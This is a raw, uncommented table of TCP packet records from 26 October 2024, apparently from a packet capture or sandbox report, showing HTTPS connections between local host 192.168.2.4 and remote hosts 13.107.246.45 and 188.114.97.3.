                                                                              Oct 26, 2024 08:49:47.422533035 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.422545910 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.422593117 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.422597885 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.424612999 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.424632072 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.477271080 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.477333069 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.477389097 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.479917049 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.479957104 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.480014086 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.480046034 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.480057955 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.480320930 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.480333090 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.484297037 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.484337091 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.484407902 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.484967947 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.484981060 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.650737047 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.651309967 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.651329041 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.651735067 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.651742935 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.661628962 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.662113905 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.662137032 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.662537098 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.662543058 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.769162893 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.769655943 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.769680023 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.770936012 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.770941973 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808331013 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808418989 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808423996 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808521986 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808562040 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.808573961 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.808680058 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.808691978 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808702946 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.808710098 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808789015 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.808815002 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.808892012 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.808901072 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.811770916 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.811795950 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.811851025 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.811899900 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.811925888 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.812002897 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.812047005 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.812060118 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.812180996 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.812191963 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.900070906 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.900240898 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.900466919 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.900466919 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.900499105 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.900515079 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.909502029 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.909535885 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.909600019 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.909744024 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.909755945 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.211329937 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.211859941 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.211880922 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.215882063 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.215887070 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.226186991 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.226891041 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.226921082 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.227874041 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.227881908 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.340743065 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.341082096 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.341121912 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.342397928 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.342528105 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.342686892 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.342730999 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.342730999 CEST49906443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.342736959 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.342746019 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.342755079 CEST4434990613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.342884064 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.343592882 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.343676090 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.343699932 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.343787909 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.343787909 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.343805075 CEST44349907188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.343864918 CEST49907443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.345659018 CEST49911443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.345664024 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.345704079 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.345722914 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.345890999 CEST49911443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.345897913 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.346122026 CEST49911443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.346127987 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.346129894 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.346142054 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.359502077 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.359605074 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.359652996 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.359749079 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.359749079 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.359870911 CEST49905443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.359883070 CEST4434990513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.362456083 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.362483978 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.362569094 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.362770081 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.362781048 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.399096966 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.399346113 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.399589062 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.399869919 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.399894953 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.403194904 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.403242111 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.403527975 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.404170036 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.404213905 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.404248953 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.404273987 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.404330015 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.404827118 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.404875040 CEST44349916188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.404977083 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.404990911 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.405107975 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.405555964 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:48.405575037 CEST44349916188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:48.546660900 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.547163010 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.547185898 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.547553062 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.547684908 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.547689915 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.547862053 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.547875881 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.548243999 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.548258066 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.676172972 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.676259995 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.676552057 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.676552057 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.676589012 CEST49909443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.676615000 CEST4434990913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.678513050 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.678586006 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.678674936 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.678869009 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.678889990 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.678934097 CEST49908443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.678940058 CEST4434990813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.679924011 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.679981947 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.681041002 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.681078911 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.681220055 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.681246042 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.681255102 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.681263924 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.681462049 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.681473017 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.706688881 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.707951069 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.707983971 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.708580017 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.708597898 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.873589993 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.873680115 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.873802900 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.873809099 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.874042988 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.874042988 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.874069929 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.874121904 CEST49910443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.874142885 CEST4434991013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.876785040 CEST49919443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.876837969 CEST4434991913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:48.877044916 CEST49919443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.877044916 CEST49919443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:48.877084017 CEST4434991913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.015944958 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.016753912 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.016781092 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.017997026 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.018572092 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.018846035 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.019157887 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.063330889 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.100007057 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.100753069 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.100822926 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.101466894 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.101483107 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.104401112 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.104885101 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.104916096 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.105607986 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.105612993 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.159380913 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.159567118 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.159653902 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.179209948 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.210931063 CEST49914443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.210956097 CEST44349914188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.211332083 CEST49911443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.211358070 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.211792946 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.212809086 CEST49911443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.212878942 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.213265896 CEST49911443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.214889050 CEST49920443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.214930058 CEST44349920188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.215084076 CEST49920443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.216947079 CEST49920443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.216960907 CEST44349920188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.235052109 CEST44349916188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.236840963 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.236907959 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.237116098 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.237687111 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.237715960 CEST44349916188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.238514900 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.239193916 CEST44349916188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.239306927 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.242237091 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.242264032 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.242316008 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.242346048 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.242369890 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.259320974 CEST44349911188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.275758982 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.275799036 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.275819063 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.275944948 CEST44349916188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.276026011 CEST49916443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.279649973 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.279968023 CEST49921443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.280002117 CEST44349921188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.280075073 CEST49921443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.283859015 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.283873081 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.285257101 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.287653923 CEST49921443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.287667036 CEST44349921188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.287935972 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.288274050 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.295581102 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.339344025 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.361577988 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.361633062 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.361680031 CEST49912443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.361696005 CEST4434991213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.366727114 CEST49922443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.366749048 CEST4434992213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.366980076 CEST49922443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.368803024 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.368822098 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.368833065 CEST49913443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.368839979 CEST4434991313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.371889114 CEST49923443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.371927023 CEST4434992313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.372148037 CEST49923443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.374358892 CEST49922443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.374377012 CEST4434992213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.376909971 CEST49923443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.376925945 CEST4434992313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.399988890 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.405303955 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.405323029 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.409033060 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.409039021 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.493083954 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.493644953 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.493673086 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.494142056 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.494148016 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.532071114 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.532099009 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.532145977 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.532156944 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.532195091 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.532444000 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.532454967 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.532474041 CEST49918443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.532480001 CEST4434991813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.535922050 CEST49924443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.535957098 CEST4434992413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.536087036 CEST49924443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.536402941 CEST49924443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.536417007 CEST4434992413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.629757881 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.629837036 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.629952908 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.630198002 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.630218983 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.630228996 CEST49917443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.630235910 CEST4434991713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.631969929 CEST4434991913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.632584095 CEST49919443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.632601023 CEST4434991913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.633013010 CEST49919443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.633018017 CEST4434991913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.633289099 CEST49925443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.633328915 CEST4434992513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.633402109 CEST49925443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.633563042 CEST49925443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:49.633574009 CEST4434992513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:49.756835938 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.757040024 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.757105112 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.757710934 CEST49915443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.757730961 CEST44349915188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:49.758516073 CEST49926443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:49.758548021 CEST44349926188.114.97.3192.168.2.4
